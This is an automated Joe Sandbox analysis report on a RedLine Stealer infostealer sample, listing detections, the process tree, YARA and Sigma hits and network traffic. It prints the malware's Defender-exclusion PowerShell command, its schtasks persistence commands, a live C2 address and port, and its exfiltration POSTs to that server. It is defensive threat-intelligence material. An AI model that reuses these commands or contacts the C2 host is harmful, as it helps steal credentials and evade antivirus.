Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lZ8NRWShfC.exe

Overview

General Information

Sample name:lZ8NRWShfC.exe
renamed because original name is a hash value
Original sample name:3599fa63d78413242a88966d3b4b14ef.exe
Analysis ID:1467127
MD5:3599fa63d78413242a88966d3b4b14ef
SHA1:44526b00e847d9a16908c79f72dab1af4a2edf29
SHA256:c08ff513ad0787ed08c72bbdcda0d166e603ea0736f5687b3dddc0f4bb87da33
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • lZ8NRWShfC.exe (PID: 6884 cmdline: "C:\Users\user\Desktop\lZ8NRWShfC.exe" MD5: 3599FA63D78413242A88966D3B4B14EF)
    • powershell.exe (PID: 6260 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TmfmVKU.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7372 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 3140 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 3612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • lZ8NRWShfC.exe (PID: 7208 cmdline: "C:\Users\user\Desktop\lZ8NRWShfC.exe" MD5: 3599FA63D78413242A88966D3B4B14EF)
    • lZ8NRWShfC.exe (PID: 7216 cmdline: "C:\Users\user\Desktop\lZ8NRWShfC.exe" MD5: 3599FA63D78413242A88966D3B4B14EF)
      • conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • TmfmVKU.exe (PID: 7308 cmdline: C:\Users\user\AppData\Roaming\TmfmVKU.exe MD5: 3599FA63D78413242A88966D3B4B14EF)
    • schtasks.exe (PID: 7552 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp76F9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • TmfmVKU.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Roaming\TmfmVKU.exe" MD5: 3599FA63D78413242A88966D3B4B14EF)
      • conhost.exe (PID: 7620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.91:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000002.1761835638.0000000003F18000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x13b2a:$a4: get_ScannedWallets
          • 0x2b94a:$a4: get_ScannedWallets
          • 0x4356a:$a4: get_ScannedWallets
          • 0x12988:$a5: get_ScanTelegram
          • 0x2a7a8:$a5: get_ScanTelegram
          • 0x423c8:$a5: get_ScanTelegram
          • 0x137ae:$a6: get_ScanGeckoBrowsersPaths
          • 0x2b5ce:$a6: get_ScanGeckoBrowsersPaths
          • 0x431ee:$a6: get_ScanGeckoBrowsersPaths
          • 0x115ca:$a7: <Processes>k__BackingField
          • 0x293ea:$a7: <Processes>k__BackingField
          • 0x4100a:$a7: <Processes>k__BackingField
          • 0xf4dc:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x272fc:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x3ef1c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x10efe:$a9: <ScanFTP>k__BackingField
          • 0x28d1e:$a9: <ScanFTP>k__BackingField
          • 0x4093e:$a9: <ScanFTP>k__BackingField
          00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000008.00000002.1870267028.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 17 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.lZ8NRWShfC.exe.3f18560.7.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.lZ8NRWShfC.exe.3f18560.7.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.lZ8NRWShfC.exe.3f18560.7.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  0.2.lZ8NRWShfC.exe.3f18560.7.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ea:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cb:$v2_6: GetUpdates
                  8.2.lZ8NRWShfC.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 31 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lZ8NRWShfC.exe", ParentImage: C:\Users\user\Desktop\lZ8NRWShfC.exe, ParentProcessId: 6884, ParentProcessName: lZ8NRWShfC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe", ProcessId: 6260, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lZ8NRWShfC.exe", ParentImage: C:\Users\user\Desktop\lZ8NRWShfC.exe, ParentProcessId: 6884, ParentProcessName: lZ8NRWShfC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe", ProcessId: 6260, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp76F9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp76F9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TmfmVKU.exe, ParentImage: C:\Users\user\AppData\Roaming\TmfmVKU.exe, ParentProcessId: 7308, ParentProcessName: TmfmVKU.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp76F9.tmp", ProcessId: 7552, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\lZ8NRWShfC.exe", ParentImage: C:\Users\user\Desktop\lZ8NRWShfC.exe, ParentProcessId: 6884, ParentProcessName: lZ8NRWShfC.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp", ProcessId: 3140, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lZ8NRWShfC.exe", ParentImage: C:\Users\user\Desktop\lZ8NRWShfC.exe, ParentProcessId: 6884, ParentProcessName: lZ8NRWShfC.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\lZ8NRWShfC.exe", ProcessId: 6260, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\lZ8NRWShfC.exe", ParentImage: C:\Users\user\Desktop\lZ8NRWShfC.exe, ParentProcessId: 6884, ParentProcessName: lZ8NRWShfC.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TmfmVKU" /XML "C:\Users\user\AppData\Local\Temp\tmp51ED.tmp", ProcessId: 3140, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: lZ8NRWShfC.exeAvira: detected
                    Found malware configuration
                    Source: 0.2.lZ8NRWShfC.exe.3f18560.7.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.91:55615"], "Bot Id": "cheat"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeReversingLabs: Detection: 68%
                    Multi AV Scanner detection for submitted file
                    Source: lZ8NRWShfC.exeReversingLabs: Detection: 68%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: lZ8NRWShfC.exeJoe Sandbox ML: detected
                    Source: lZ8NRWShfC.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: lZ8NRWShfC.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 4x nop then jmp 04F15113h0_2_04F1531D
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 4x nop then jmp 04F15113h0_2_04F1569A
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 4x nop then jmp 04F15113h0_2_04F157CD
                    Source: C:\Users\user\Desktop\lZ8NRWShfC.exeCode function: 4x nop then jmp 04F15113h0_2_04F15B21
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 4x nop then jmp 031A4653h10_2_031A485D
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 4x nop then jmp 031A4653h10_2_031A5061
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 4x nop then jmp 031A4653h10_2_031A4BDA
                    Source: C:\Users\user\AppData\Roaming\TmfmVKU.exeCode function: 4x nop then jmp 031A4653h10_2_031A4D0D

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 185.222.58.91:55615
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49732
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49735
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49734
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49744
                    Source: global trafficTCP traffic: 192.168.2.4:49732 -> 185.222.58.91:55615
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.91:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.91:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.91:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.91:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.91:55615Content-Length: 925603Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.91:55615Content-Length: 925595Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.91:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.91:55615Content-Length: 925089Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.91:55615Content-Length: 925081Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.91
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.91:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.91:5
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.91:55615
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.58.91:55615/
                    Source: lZ8NRWShfC.exe, TmfmVKU.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: lZ8NRWShfC.exe, TmfmVKU.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: lZ8NRWShfC.exe, TmfmVKU.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002C75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                    Source: lZ8NRWShfC.exe, 00000008.00000002.1875131842.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, TmfmVKU.exe, 0000000E.00000002.1966151891.0000000002BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
